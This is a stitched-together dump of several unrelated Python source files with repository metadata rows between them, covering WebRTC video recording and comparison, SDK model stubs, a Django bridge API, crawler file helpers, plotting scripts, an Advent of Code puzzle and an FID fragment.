'-r', '%d' % options.framerate,
'-f', '%s' % options.recording_api,
'-i', '%s' % options.test_video_device,
'-pix_fmt', '%s' % options.pixel_format,
'-s', '%dx%d' % (options.frame_width, options.frame_height),
'-t', '%d' % options.test_duration,
'-r', '%d' % options.framerate,
test_file
]
print 'Trying to record from reference recorder...'
ref_recorder = subprocess.Popen(ref_cmd)
# Start the 2nd recording a little later to ensure the 1st one has started.
# TODO(jansson) Check that the ref_recorder output file exists rather than
# using sleep.
time.sleep(options.time_between_recordings)
print 'Trying to record from test recorder...'
test_recorder = subprocess.Popen(test_cmd)
test_recorder.wait()
ref_recorder.wait()
# ffmpeg does not abort when it fails, need to check return code.
if ref_recorder.returncode != 0 or test_recorder.returncode != 0:
# Cleanup recording directories.
shutil.rmtree(ref_file_location)
shutil.rmtree(test_file_location)
raise FfmpegError('Recording failed, check ffmpeg output.')
else:
print 'Ref file recorded to: ' + os.path.abspath(ref_file)
print 'Test file recorded to: ' + os.path.abspath(test_file)
print 'Recording done!\n'
return FlipAndCropRecordings(options, test_file_name, test_file_location,
ref_file_name, ref_file_location)
def FlipAndCropRecordings(options, test_file_name, test_file_location,
ref_file_name, ref_file_location):
"""Performs a horizontal flip of the reference video to match the test video.
This is done to the match orientation and then crops the ref and test videos
using the options.test_crop_parameters and options.ref_crop_parameters.
Args:
options(object): Contains all the provided command line options.
test_file_name(string): Name of the test video file recording.
test_file_location(string): Path to the test video file recording.
ref_file_name(string): Name of the reference video file recording.
ref_file_location(string): Path to the reference video file recording.
Returns:
recording_files_and_time(dict): key: value pair with the path to cropped
test and reference video files.
Raises:
FfmpegError: If the ffmpeg command fails.
"""
print 'Trying to crop videos...'
# Ref file cropping.
cropped_ref_file_name = 'cropped_' + ref_file_name
cropped_ref_file = os.path.abspath(
os.path.join(ref_file_location, cropped_ref_file_name))
ref_video_crop_cmd = [
options.ffmpeg,
'-v', 'error',
'-s', '%dx%d' % (options.frame_width, options.frame_height),
'-i', '%s' % os.path.join(ref_file_location, ref_file_name),
'-vf', '%s' % options.ref_crop_parameters,
'-c:a', 'copy',
cropped_ref_file
]
# Test file cropping.
cropped_test_file_name = 'cropped_' + test_file_name
cropped_test_file = os.path.abspath(
os.path.join(test_file_location, cropped_test_file_name))
test_video_crop_cmd = [
options.ffmpeg,
'-v', 'error',
'-s', '%dx%d' % (options.frame_width, options.frame_height),
'-i', '%s' % os.path.join(test_file_location, test_file_name),
'-vf', '%s' % options.test_crop_parameters,
'-c:a', 'copy',
cropped_test_file
]
ref_crop = subprocess.Popen(ref_video_crop_cmd)
ref_crop.wait()
test_crop = subprocess.Popen(test_video_crop_cmd)
test_crop.wait()
# ffmpeg does not abort when it fails, need to check return code.
if ref_crop.returncode != 0 or test_crop.returncode != 0:
# Cleanup recording directories.
shutil.rmtree(ref_file_location)
shutil.rmtree(test_file_location)
raise FfmpegError('Cropping failed, check ffmpeg output.')
else:
print 'Ref file cropped to: ' + cropped_ref_file
print 'Test file cropped to: ' + cropped_test_file
print 'Cropping done!\n'
# Need to return these so they can be used by other parts.
cropped_recordings = {
'cropped_test_file' : cropped_test_file,
'cropped_ref_file' : cropped_ref_file
}
return cropped_recordings
def CompareVideos(options, cropped_ref_file, cropped_test_file):
"""Runs the compare_video.py script from src/webrtc/rtc_tools using path.
Uses the path from recording_result and writes the output to a file named
<options.app_name + '_' + CURRENT_TIME + '_result.txt> in the reference video
recording folder taken from recording_result.
Args:
options(object): Contains all the provided command line options.
cropped_ref_file(string): Path to cropped reference video file.
cropped_test_file(string): Path to cropped test video file.
Raises:
CompareVideosError: If compare_videos.py fails.
"""
print 'Starting comparison...'
print 'Grab a coffee, this might take a few minutes...'
compare_videos_script = os.path.abspath(options.compare_videos_script)
rec_path = os.path.abspath(os.path.join(
os.path.dirname(cropped_test_file)))
result_file_name = os.path.join(rec_path, '%s_%s_result.txt') % (
options.app_name, CURRENT_TIME)
# Find the crop dimensions (e.g. 950 and 420) in the ref crop parameter
# string: 'hflip, crop=950:420:130:56'
for param in options.ref_crop_parameters.split('crop'):
if param[0] == '=':
crop_width = int(param.split(':')[0].split('=')[1])
crop_height = int(param.split(':')[1])
compare_cmd = [
compare_videos_script,
'--ref_video=%s' % cropped_ref_file,
'--test_video=%s' % cropped_test_file,
'--frame_analyzer=%s' % os.path.abspath(options.frame_analyzer),
'--zxing_path=%s' % options.zxing_path,
'--ffmpeg_path=%s' % options.ffmpeg,
'--stats_file_ref=%s_stats.txt' %
os.path.join(os.path.dirname(cropped_ref_file), cropped_ref_file),
'--stats_file_test=%s_stats.txt' %
os.path.join(os.path.dirname(cropped_test_file), cropped_test_file),
'--yuv_frame_height=%d' % crop_height,
'--yuv_frame_width=%d' % crop_width
]
with open(result_file_name, 'w') as f:
try:
compare_video_recordings = subprocess.check_output(compare_cmd)
f.write(compare_video_recordings)
except subprocess.CalledProcessError as error:
raise CompareVideosError('Failed to perform comparison: %s' % error)
else:
print 'Result recorded to: %s' % os.path.abspath(result_file_name)
print 'Comparison done!'
return compare_video_recordings
def main():
"""The main function.
A simple invocation is:
./run_video_analysis.py \
--app_name AppRTCMobile \
--ffmpeg ./ffmpeg --ref_video_device=/dev/video0 \
--test_video_device=/dev/video1 \
--zxing_path ./zxing \
--test_crop_parameters 'crop=950:420:130:56' \
--ref_crop_parameters 'hflip, crop=950:420:130:56' \
--ref_rec_dir /tmp/ref \
--test_rec_dir /tmp/test
This will produce the following files if successful:
# Original video recordings.
/tmp/ref/AppRTCMobile_<recording date and time>_ref.yuv
/tmp/test/AppRTCMobile_<recording date and time>_test.yuv
# Cropped video recordings according to the crop parameters.
/tmp/ref/cropped_AppRTCMobile_<recording date and time>_ref.yuv
/tmp/test/cropped_AppRTCMobile_<recording date and time>_ref.yuv
# Comparison metrics from cropped test and ref videos.
/tmp/test/AppRTCMobile_<recording date and time>_result.text
"""
options = _ParseArgs()
RestartMagewellDevices(options.ref_video_device, options.test_video_device)
record_paths = CreateRecordingDirs(options)
recording_result = StartRecording(options, record_paths['ref_rec_location'],
record_paths['test_rec_location'])
# Do not require compare_video.py script to run, no metrics will be generated.
if options.compare_videos_script:
CompareVideos(options, recording_result['cropped_ref_file'],
recording_result['cropped_test_file'])
else:
print ('Skipping compare videos step due to compare_videos flag were not '
'passed.')
if __name__ == '__main__':
sys.exit(main())
| 38.236791
| 80
| 0.692359
|
9184315bf23b8723f9a64149471231551a9b503d
| 922
|
py
|
Python
|
isi_sdk_8_2_2/test/test_hdfs_fsimage_job_job.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 24
|
2018-06-22T14:13:23.000Z
|
2022-03-23T01:21:26.000Z
|
isi_sdk_8_2_2/test/test_hdfs_fsimage_job_job.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 46
|
2018-04-30T13:28:22.000Z
|
2022-03-21T21:11:07.000Z
|
isi_sdk_8_2_2/test/test_hdfs_fsimage_job_job.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 29
|
2018-06-19T00:14:04.000Z
|
2022-02-08T17:51:19.000Z
|
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 9
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_8_2_2
from isi_sdk_8_2_2.models.hdfs_fsimage_job_job import HdfsFsimageJobJob # noqa: E501
from isi_sdk_8_2_2.rest import ApiException
class TestHdfsFsimageJobJob(unittest.TestCase):
"""HdfsFsimageJobJob unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testHdfsFsimageJobJob(self):
"""Test HdfsFsimageJobJob"""
# FIXME: construct object with mandatory attributes with example values
# model = isi_sdk_8_2_2.models.hdfs_fsimage_job_job.HdfsFsimageJobJob() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 22.487805
| 93
| 0.711497
|
a16f300ddc0c8b4b3a0cd958f036c294d5fe130e
| 3,366
|
py
|
Python
|
pay-api/src/pay_api/models/fee_schedule.py
|
saravankumarpa/sbc-pay
|
2362549e52c575ab4ea6c19de987f0ebc9d06571
|
[
"Apache-2.0"
] | null | null | null |
pay-api/src/pay_api/models/fee_schedule.py
|
saravankumarpa/sbc-pay
|
2362549e52c575ab4ea6c19de987f0ebc9d06571
|
[
"Apache-2.0"
] | null | null | null |
pay-api/src/pay_api/models/fee_schedule.py
|
saravankumarpa/sbc-pay
|
2362549e52c575ab4ea6c19de987f0ebc9d06571
|
[
"Apache-2.0"
] | null | null | null |
# Copyright © 2019 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Model to handle all operations related to fee and fee schedule."""
from datetime import date, datetime
from sqlalchemy import ForeignKey
from sqlalchemy.orm import relationship
from .corp_type import CorpType
from .db import db, ma
from .fee_code import FeeCode
from .filing_type import FilingType
class FeeSchedule(db.Model):
"""This class manages all of the base data about a fee schedule.
Fee schedule holds the data related to filing type and fee code which is used to calculate the fees for a filing
"""
__tablename__ = 'fee_schedule'
__table_args__ = (
db.UniqueConstraint('filing_type_code', 'corp_type_code', 'fee_code', name='unique_fee_sched_1'),
)
fee_schedule_id = db.Column(db.Integer, primary_key=True, autoincrement=True)
filing_type_code = db.Column(db.String(10), ForeignKey('filing_type.code'), nullable=False)
corp_type_code = db.Column(db.String(10), ForeignKey('corp_type.code'), nullable=False)
fee_code = db.Column(db.String(10), ForeignKey('fee_code.code'), nullable=False)
fee_start_date = db.Column('fee_start_date', db.Date, default=date.today(), nullable=False)
fee_end_date = db.Column('fee_end_date', db.Date, default=None, nullable=True)
filing_type = relationship(FilingType, foreign_keys=[filing_type_code], lazy='joined', innerjoin=True)
corp_type = relationship(CorpType, foreign_keys=[corp_type_code], lazy='joined', innerjoin=True)
fee = relationship(FeeCode, foreign_keys=[fee_code], lazy='joined', innerjoin=True)
@classmethod
def find_by_filing_type_and_corp_type(cls, corp_type_code: str,
filing_type_code: str,
valid_date: datetime = None
):
"""Given a filing_type_code and corp_type, this will return fee schedule."""
if not valid_date:
valid_date = date.today()
fee_schedule = None
if filing_type_code and corp_type_code:
query = cls.query.filter_by(filing_type_code=filing_type_code). \
filter_by(corp_type_code=corp_type_code). \
filter(FeeSchedule.fee_start_date <= valid_date). \
filter((FeeSchedule.fee_end_date.is_(None)) | (FeeSchedule.fee_end_date >= valid_date))
fee_schedule = query.one_or_none()
return fee_schedule
def save(self):
"""Save fee schedule."""
db.session.add(self)
db.session.commit()
class FeeScheduleSchema(ma.ModelSchema):
"""Main schema used to serialize the Business."""
class Meta: # pylint: disable=too-few-public-methods
"""Returns all the fields from the SQLAlchemy class."""
model = FeeSchedule
| 41.555556
| 116
| 0.691919
|
b3d8640095343bdfd01fd50c769fcf3b9c43d86b
| 2,544
|
py
|
Python
|
packages/sdk/odahuflow/sdk/models/algorithm_source.py
|
odahu/odahuflow
|
58c3220a266a61bb893cf79c4b994569e3445097
|
[
"ECL-2.0",
"Apache-2.0"
] | 12
|
2020-10-13T15:39:52.000Z
|
2021-10-11T17:13:42.000Z
|
packages/sdk/odahuflow/sdk/models/algorithm_source.py
|
odahu/odahuflow
|
58c3220a266a61bb893cf79c4b994569e3445097
|
[
"ECL-2.0",
"Apache-2.0"
] | 475
|
2019-11-18T12:40:47.000Z
|
2022-03-29T21:17:38.000Z
|
packages/sdk/odahuflow/sdk/models/algorithm_source.py
|
odahu/odahuflow
|
58c3220a266a61bb893cf79c4b994569e3445097
|
[
"ECL-2.0",
"Apache-2.0"
] | 4
|
2020-02-25T11:26:10.000Z
|
2021-03-10T12:01:00.000Z
|
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from odahuflow.sdk.models.base_model_ import Model
from odahuflow.sdk.models.object_storage import ObjectStorage # noqa: F401,E501
from odahuflow.sdk.models.vcs import VCS # noqa: F401,E501
from odahuflow.sdk.models import util
class AlgorithmSource(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, object_storage: ObjectStorage=None, vcs: VCS=None): # noqa: E501
"""AlgorithmSource - a model defined in Swagger
:param object_storage: The object_storage of this AlgorithmSource. # noqa: E501
:type object_storage: ObjectStorage
:param vcs: The vcs of this AlgorithmSource. # noqa: E501
:type vcs: VCS
"""
self.swagger_types = {
'object_storage': ObjectStorage,
'vcs': VCS
}
self.attribute_map = {
'object_storage': 'objectStorage',
'vcs': 'vcs'
}
self._object_storage = object_storage
self._vcs = vcs
@classmethod
def from_dict(cls, dikt) -> 'AlgorithmSource':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The AlgorithmSource of this AlgorithmSource. # noqa: E501
:rtype: AlgorithmSource
"""
return util.deserialize_model(dikt, cls)
@property
def object_storage(self) -> ObjectStorage:
"""Gets the object_storage of this AlgorithmSource.
:return: The object_storage of this AlgorithmSource.
:rtype: ObjectStorage
"""
return self._object_storage
@object_storage.setter
def object_storage(self, object_storage: ObjectStorage):
"""Sets the object_storage of this AlgorithmSource.
:param object_storage: The object_storage of this AlgorithmSource.
:type object_storage: ObjectStorage
"""
self._object_storage = object_storage
@property
def vcs(self) -> VCS:
"""Gets the vcs of this AlgorithmSource.
:return: The vcs of this AlgorithmSource.
:rtype: VCS
"""
return self._vcs
@vcs.setter
def vcs(self, vcs: VCS):
"""Sets the vcs of this AlgorithmSource.
:param vcs: The vcs of this AlgorithmSource.
:type vcs: VCS
"""
self._vcs = vcs
| 27.354839
| 88
| 0.638758
|
1e002a1aa14324a06078eed6fee7d1563c725070
| 7,186
|
py
|
Python
|
oapi/views.py
|
vantagecrypto/OV_Data_Bridge
|
b09f58e9c4664fa9842eead95b3e54a8027870e2
|
[
"MIT"
] | null | null | null |
oapi/views.py
|
vantagecrypto/OV_Data_Bridge
|
b09f58e9c4664fa9842eead95b3e54a8027870e2
|
[
"MIT"
] | null | null | null |
oapi/views.py
|
vantagecrypto/OV_Data_Bridge
|
b09f58e9c4664fa9842eead95b3e54a8027870e2
|
[
"MIT"
] | null | null | null |
from rest_framework.views import APIView
from rest_framework import status
from django.http import JsonResponse
import json
from sectors.common import error
from sectors.common.bridge import common as bridge_common
from db.models import (
TBLApiKey,
TBLBridge,
)
def get_user(request, unique_id):
if TBLApiKey.objects.filter(unique_id=unique_id, api_key=request.headers.get('api-key')).exists():
api_key = TBLApiKey.objects.get(unique_id=unique_id, api_key=request.headers.get('api-key'))
return api_key.user
return None
def api_decorator():
def decorator(func):
def wrapper(self, request, *args, **kwargs):
user = get_user(request, kwargs['param1'])
if user is None:
text = error.INVALID_UNIQUE_ID_API_KEY
status_code = status.HTTP_401_UNAUTHORIZED
return JsonResponse({
'text': text
}, status=status_code)
kwargs['user'] = user
return func(self, request, *args, **kwargs)
return wrapper
return decorator
def parse_bridge_params(request):
payload = request.data
bridge_id = 0
if request.method == 'POST':
if 'type' not in payload:
return {
'status_code': status.HTTP_400_BAD_REQUEST,
'text': '"type" field required for the request.'
}
if 'name' not in payload:
return {
'status_code': status.HTTP_400_BAD_REQUEST,
'text': '"name" field required for the request.'
}
elif request.method == 'PUT':
if 'id' not in payload:
return {
'status_code': status.HTTP_400_BAD_REQUEST,
'text': '"id" field required for the request.'
}
try:
bridge_id = int(payload['id'])
except:
bridge_id = 0
if not bridge_id or not TBLBridge.objects.filter(id=bridge_id).exists():
return {
'status_code': status.HTTP_400_BAD_REQUEST,
'text': error.UNKNOWN_BRIDGE_ID
}
if 'type' not in payload:
bridge_type = TBLBridge.objects.get(id=bridge_id).type
payload['type'] = bridge_common.get_bridge_by_type(bridge_type)['abbreviation']
else:
pass
b = bridge_common.get_bridge_by_abb(payload['type'])
if b is None:
return {
'status_code': status.HTTP_400_BAD_REQUEST,
'text': error.UNKNOWN_BRIDGE_TYPE
}
params = {
'id': bridge_id,
'type': b['type'],
}
if 'name' in payload:
params['name'] = payload['name']
if b['src'] in payload:
params['src_address'] = payload[b['src']]
if b['dst'] in payload:
params['dst_address'] = payload[b['dst']]
if 'format_search' in payload and 'format_re_format' in payload and 'format_any' in payload:
params['format'] = json.dumps({
'search_word': payload['format_search'],
'replace_word': payload['format_re_format'],
'any': True if payload['format_any'].lower() == 'yes' else False
})
if 'frequency' in payload:
params['frequency'] = payload['frequency']
if 'flush' in payload:
params['flash'] = payload['flush']
if 'file_format' in payload:
params['file_format'] = payload['file_format']
return {
'status_code': status.HTTP_200_OK,
'params': params
}
class BridgeApi(APIView):
@api_decorator()
def post(self, request, *args, **kwargs):
bridge_info = {}
resp_data = parse_bridge_params(request)
if resp_data['status_code'] < 300:
resp_data, bridge = bridge_common.save_bridge(request, resp_data['params'], kwargs['user'])
if resp_data['status_code'] < 300:
bridge_info['id'] = bridge.id
if not bridge_info:
bridge_info = resp_data['text']
return JsonResponse(bridge_info, status=resp_data['status_code'])
@api_decorator()
def get(self, request, *args, **kwargs):
payload = request.data
status_code = status.HTTP_200_OK
if 'id' not in payload:
resp_data = '"id" field required for the request.'
status_code = status.HTTP_400_BAD_REQUEST
else:
resp_data = []
if payload['id'] == 'all':
bridges_obj = TBLBridge.objects.filter(user_id=kwargs['user_id'])
else:
try:
bridge_id = int(payload['id'])
bridges_obj = TBLBridge.objects.filter(id=bridge_id)
except:
bridges_obj = []
status_code = status.HTTP_400_BAD_REQUEST
for bridge in bridges_obj:
b = bridge_common.get_bridge_by_type(bridge.type)
b_info = {
'id': bridge.id,
'name': bridge.name,
'type': b['abbreviation'],
b['src']: bridge.src_address,
b['dst']: bridge.dst_address
}
if bridge.format:
bridge_format = json.loads(bridge.format)
b_info['format_search'] = bridge_format['search_word']
b_info['format_re_format'] = bridge_format['replace_word']
b_info['format_any'] = 'Yes' if bridge_format['any'] else 'No'
if bridge.frequency:
b_info['frequency'] = bridge.frequency
if bridge.flush:
b_info['flush'] = bridge.flush
if bridge.file_format:
b_info['file_format'] = bridge.file_format
resp_data.append(b_info)
return JsonResponse(resp_data, status=status_code, safe=False)
@api_decorator()
def put(self, request, *args, **kwargs):
resp_data = parse_bridge_params(request)
if resp_data['status_code'] < 300:
resp_data, _ = bridge_common.save_bridge(request, resp_data['params'], kwargs['user'])
if resp_data['status_code'] < 300:
return JsonResponse('', status=status.HTTP_202_ACCEPTED, safe=False)
return JsonResponse(resp_data['text'], status=resp_data['status_code'])
@api_decorator()
def delete(self, request, *args, **kwargs):
payload = request.data
resp_data = ''
status_code = status.HTTP_202_ACCEPTED
if 'id' not in payload:
resp_data = '"id" field required for the request.'
status_code = status.HTTP_400_BAD_REQUEST
else:
if payload['id'] == 'all':
TBLBridge.objects.filter(user_id=kwargs['user_id']).delete()
else:
try:
bridge_id = int(payload['id'])
TBLBridge.objects.filter(id=bridge_id).delete()
except:
status_code = status.HTTP_406_NOT_ACCEPTABLE
return JsonResponse(resp_data, status=status_code, safe=False)
| 33.115207
| 103
| 0.56624
|
0d8833f8ab2546ada196d308923ce6128c8b4e32
| 1,049
|
py
|
Python
|
general.py
|
indrajit15/WebCrawler_Python
|
e5836e8da05532f2b7d6f5f1e9e409fe154cd80b
|
[
"MIT"
] | null | null | null |
general.py
|
indrajit15/WebCrawler_Python
|
e5836e8da05532f2b7d6f5f1e9e409fe154cd80b
|
[
"MIT"
] | null | null | null |
general.py
|
indrajit15/WebCrawler_Python
|
e5836e8da05532f2b7d6f5f1e9e409fe154cd80b
|
[
"MIT"
] | null | null | null |
import os
def create_directory(directory):
if( not os.path.exists(directory)):
print("creating project "+ directory)
os.makedirs(directory)
#create queue and crawled files
def create_data_files(project_name,base_url):
queue=project_name+'/queue.txt'
crawled=project_name+'/crawled.txt'
if(not os.path.isfile(queue)):
write_file(queue,base_url)
if(not os.path.isfile(crawled)):
write_file(crawled,'')
#create a new file
def write_file(path, data):
f=open(path,'w')
f.write(data)
f.close()
#appending data to an existing file
def append_data(path,data):
with open(path,'a') as file:
file.write(data+"\n")
#deleting contents
def delete_file_contents(path):
with open(path,'w'):
pass
#file to set
def file_to_set(file_name):
results=set()
with open(file_name,'rt') as f:
for line in f:
results.add(line.replace('\n',''))
return results
#set to a different file
def set_to_file(links,file):
delete_file_contents(file)
for link in sorted(links):
append_data(file,link)
| 23.840909
| 46
| 0.700667
|
c35b3d1b3c5f9dad59deab779cde39baf905ba32
| 1,805
|
py
|
Python
|
Labs/ComplexitySparseMatrices/plots.py
|
jessicaleete/numerical_computing
|
cc71f51f35ca74d00e617af3d1a0223e19fb9a68
|
[
"CC-BY-3.0"
] | 10
|
2016-10-18T19:54:25.000Z
|
2021-10-09T20:12:38.000Z
|
Labs/ComplexitySparseMatrices/plots.py
|
jessicaleete/numerical_computing
|
cc71f51f35ca74d00e617af3d1a0223e19fb9a68
|
[
"CC-BY-3.0"
] | null | null | null |
Labs/ComplexitySparseMatrices/plots.py
|
jessicaleete/numerical_computing
|
cc71f51f35ca74d00e617af3d1a0223e19fb9a68
|
[
"CC-BY-3.0"
] | 2
|
2017-05-14T16:07:59.000Z
|
2020-06-20T09:05:06.000Z
|
import matplotlib
matplotlib.rcParams = matplotlib.rc_params_from_file('../../matplotlibrc')
import numpy as np
from matplotlib import pyplot as plt
from scipy import sparse
def upper_bound():
x = np.linspace(25, 200)
y1 = 2*x**3
y2 = (1.5)*x**3+75*x**2+250*x+30
plt.plot(x, y2, label="f(n)")
plt.plot(x, y1, label="2n^3")
plt.legend(loc='upper left')
plt.savefig('asymp_upper_bound.pdf')
def solution1_new():
x = np.array([100, 200, 400, 800])
y1 = np.array([.584, 1.17, 2.34, 4.66])
y2 = np.array([.648, 2.35, 9.05, 35.7])
y3 = np.array([.592, 2.59, 10.4, 41.2])
y4 = np.array([.591, 3.05, 19.1, 135])
y5 = np.array([.579, 2.59, 15.1, 95.5])
plt.plot(x, y1, label="Function 1")
plt.plot(x, y2, label="Function 2")
plt.plot(x, y3, label="Function 3")
plt.plot(x, y4, label="Function 4")
plt.plot(x, y5, label="Function 5")
plt.legend(loc='upper left')
plt.savefig('complexity_problem.pdf')
def solution1():
runtimes = [8.95, 36.7, 144, 557]
inputs = [1000, 2000, 4000, 8000]
plt.plot(inputs, runtimes, 'go')
plt.savefig('prob1.pdf')
def spy_sparse():
n = 10000
B = np.random.rand(3, n)
A = sparse.spdiags(B, range(-1, 2), n, n)
plt.spy(A)
plt.savefig('spy.pdf')
def complexitycurves():
plt.clf()
x = np.linspace(.01, 20, 500)
plt.plot(x, np.log2(x)*x, label='$n\log n$')
plt.plot(x, x, label='$n$')
plt.plot(x, x**2, label='$n^2$')
plt.plot(x, 2**x, label='$2^n$')
plt.axis([0., 20., 0., 90.])
plt.xlabel("Problem size (n)")
plt.ylabel("Execution time")
plt.legend(loc=2)
plt.savefig("complexitycurves.pdf")
if __name__ == "__main__":
spy_sparse()
complexitycurves()
solution1()
upper_bound()
solution1_new()
| 28.203125
| 74
| 0.587812
|
b9ce72293f62d8662301660af2452243d587cad9
| 1,955
|
py
|
Python
|
src/08.py
|
peppermintpatty5/advent2021
|
e11528a26e2be37bbc0943b1b7962dc7006fab63
|
[
"MIT"
] | null | null | null |
src/08.py
|
peppermintpatty5/advent2021
|
e11528a26e2be37bbc0943b1b7962dc7006fab63
|
[
"MIT"
] | null | null | null |
src/08.py
|
peppermintpatty5/advent2021
|
e11528a26e2be37bbc0943b1b7962dc7006fab63
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import sys
def part1(input_txt: str) -> int:
left_sides = []
right_sides = []
for line in input_txt.splitlines():
a, b = line.split(" | ")
left_sides.append(a.split())
right_sides.append(b.split())
return sum(sum(1 for x in item if len(x) in (2, 3, 4, 7)) for item in right_sides)
def calc_output(left_side: list, right_side: list) -> int:
"""
Calculate the 4-digit output value of the entry.
"""
unique_patterns = {2: "1", 3: "7", 4: "4", 7: "8"}
signal_patterns = [set(x) for x in left_side]
p = {}
# identify the 1, 4, 7, and 8
for pattern in signal_patterns:
if len(pattern) in unique_patterns:
digit = unique_patterns[len(pattern)]
p[digit] = pattern
# identify the 0, 6, and 9
for pattern in signal_patterns:
if len(pattern) == 6:
if p["4"] <= pattern:
p["9"] = pattern
elif p["1"] <= pattern:
p["0"] = pattern
else:
p["6"] = pattern
# identify the 2, 3, and 5
for pattern in signal_patterns:
if len(pattern) == 5:
if p["1"] <= pattern:
p["3"] = pattern
elif pattern <= p["6"]:
p["5"] = pattern
else:
p["2"] = pattern
p_inv = {"".join(sorted(pattern)): digit for digit, pattern in p.items()}
return int("".join(p_inv["".join(sorted(x))] for x in right_side))
def part2(input_txt: str) -> int:
left_sides = []
right_sides = []
for line in input_txt.splitlines():
a, b = line.split(" | ")
left_sides.append(a.split())
right_sides.append(b.split())
return sum(calc_output(l, r) for l, r in zip(left_sides, right_sides))
def main():
input_txt = sys.stdin.read()
print(part1(input_txt))
print(part2(input_txt))
if __name__ == "__main__":
main()
| 26.066667
| 86
| 0.53913
|
6e5af481a2ef7be7a8b0fec552bb29a2b6979da4
| 4,163
|
py
|
Python
|
keystoneclient/adapter.py
|
jamielennox/python-keystoneclient
|
a1bc48c0fc475db6bca761a9023c35adab740dab
|
[
"Apache-1.1"
] | null | null | null |
keystoneclient/adapter.py
|
jamielennox/python-keystoneclient
|
a1bc48c0fc475db6bca761a9023c35adab740dab
|
[
"Apache-1.1"
] | null | null | null |
keystoneclient/adapter.py
|
jamielennox/python-keystoneclient
|
a1bc48c0fc475db6bca761a9023c35adab740dab
|
[
"Apache-1.1"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from keystoneclient import utils
class Adapter(object):
"""An instance of a session with local variables.
A session is a global object that is shared around amongst many clients. It
therefore contains state that is relevant to everyone. There is a lot of
state such as the service type and region_name that are only relevant to a
particular client that is using the session. An adapter provides a wrapper
of client local data around the global session object.
"""
@utils.positional()
def __init__(self, session, service_type=None, service_name=None,
interface=None, region_name=None, auth=None,
user_agent=None):
"""Create a new adapter.
:param Session session: The session object to wrap.
:param str service_type: The default service_type for URL discovery.
:param str service_name: The default service_name for URL discovery.
:param str interface: The default interface for URL discovery.
:param str region_name: The default region_name for URL discovery.
:param auth.BaseAuthPlugin auth: An auth plugin to use instead of the
session one.
:param str user_agent: The User-Agent string to set.
"""
self.session = session
self.service_type = service_type
self.service_name = service_name
self.interface = interface
self.region_name = region_name
self.user_agent = user_agent
self.auth = auth
def request(self, url, method, **kwargs):
endpoint_filter = kwargs.setdefault('endpoint_filter', {})
if self.service_type:
endpoint_filter.setdefault('service_type', self.service_type)
if self.service_name:
endpoint_filter.setdefault('service_name', self.service_name)
if self.interface:
endpoint_filter.setdefault('interface', self.interface)
if self.region_name:
endpoint_filter.setdefault('region_name', self.region_name)
if self.auth:
kwargs.setdefault('auth', self.auth)
if self.user_agent:
kwargs.setdefault('user_agent', self.user_agent)
return self.session.request(url, method, **kwargs)
def get(self, url, **kwargs):
return self.request(url, 'GET', **kwargs)
def head(self, url, **kwargs):
return self.request(url, 'HEAD', **kwargs)
def post(self, url, **kwargs):
return self.request(url, 'POST', **kwargs)
def put(self, url, **kwargs):
return self.request(url, 'PUT', **kwargs)
def patch(self, url, **kwargs):
return self.request(url, 'PATCH', **kwargs)
def delete(self, url, **kwargs):
return self.request(url, 'DELETE', **kwargs)
class LegacyJsonAdapter(Adapter):
"""Make something that looks like an old HTTPClient.
A common case when using an adapter is that we want an interface similar to
the HTTPClients of old which returned the body as JSON as well.
You probably don't want this if you are starting from scratch.
"""
def request(self, *args, **kwargs):
headers = kwargs.setdefault('headers', {})
headers.setdefault('Accept', 'application/json')
try:
kwargs['json'] = kwargs.pop('body')
except KeyError:
pass
resp = super(LegacyJsonAdapter, self).request(*args, **kwargs)
body = None
if resp.text:
try:
body = resp.json()
except ValueError:
pass
return resp, body
| 35.887931
| 79
| 0.652174
|
61b49cf481c4992f4b2e8bd881a6b165508802e5
| 2,959
|
py
|
Python
|
fid_varying_renyigan.py
|
renyigan-lkgan/RenyiGAN
|
c4bbb86e6037e0b95ee4c00c18729a8a8a3d2946
|
[
"MIT"
] | null | null | null |
fid_varying_renyigan.py
|
renyigan-lkgan/RenyiGAN
|
c4bbb86e6037e0b95ee4c00c18729a8a8a3d2946
|
[
"MIT"
] | 1
|
2020-09-25T22:37:05.000Z
|
2020-09-25T22:37:05.000Z
|
fid_varying_renyigan.py
|
vincihb/RenyiGAN
|
c4bbb86e6037e0b95ee4c00c18729a8a8a3d2946
|
[
"MIT"
] | 1
|
2020-10-07T19:14:21.000Z
|
2020-10-07T19:14:21.000Z
|
# Raw FID scores over epochs
import tensorflow as tf
import numpy as np
import scipy as sp
import multiprocessing
import os
class Process:
def __init__(self):
print("Evaluating images")
def fid(self, info1, info2):
(mu1, cov1) = info1 # p_x
(mu2, cov2) = info2 # p_g
covSqrt = sp.linalg.sqrtm(np.matmul(cov1, cov2))
if np.iscomplexobj(covSqrt):
covSqrt = covSqrt.real
